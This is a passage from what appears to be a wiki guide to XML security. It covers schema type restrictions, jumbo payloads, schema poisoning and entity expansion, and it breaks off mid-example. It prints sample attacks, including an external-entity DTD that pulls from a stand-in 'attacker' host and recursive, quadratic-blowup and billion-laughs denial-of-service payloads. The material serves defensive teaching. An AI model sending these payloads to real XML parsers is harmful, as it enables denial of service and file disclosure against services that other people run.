Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
